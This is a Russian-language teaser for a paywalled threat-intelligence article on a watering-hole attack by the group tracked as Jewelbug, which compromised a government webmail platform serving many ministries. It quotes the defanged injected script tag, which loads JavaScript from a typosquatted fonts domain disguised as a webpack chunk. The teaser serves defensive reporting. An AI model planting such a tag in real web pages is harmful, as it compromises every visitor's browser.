В общей установке вебмейла, которую государственный телеком-оператор одной ближневосточной страны держал сразу для всех ведомств, в какой-то момент появилась одна лишняя строка:
<script src="hxxps://fonts.chrorne[.]com/dist/js/12.qgfvjzvs.chunk.js"></script>
Путь притворяется webpack-чанком, домен – опечаткой в Google Fonts. С этой правки watering-hole лёг на каждый тенант платформы разом: оборона, финансы, МВД, МИД, центробанк, транспорт, энергетика, почта.
Symantec Threat Hunter Team потратила на эту группу несколько месяцев и зашла не со стороны жертв, а со стороны операторов – в панель управления, базу жертв, серверные логи и рабочие артефакты разработчика. Оттуда и вытащили машину целиком: фреймворк, живущий в браузере, два бэкдора под разные операционные системы, тридцать семь боевых модулей – часть с поимённым списком целей внутри, – три независимых канала управления и вторую половину бизнеса, где та же команда с той же панели крутила поисковую выдачу и фальшивые криптобиржи. Группу отслеживают как Jewelbug (Earth Alux, REF7707, CL-STA-0049).
Ниже – вся эта конструкция, от лишней строки в шаблоне до консоли гипервизора внутри госсети. Первый вопрос к ней: почему одного тега хватило на пятнадцать министерств.
Эта статья доступна только подписчикам. Оформите подписку, чтобы получить доступ ко всем премиум статьям.
Оформить подписку →Автор: hacker@shifry.local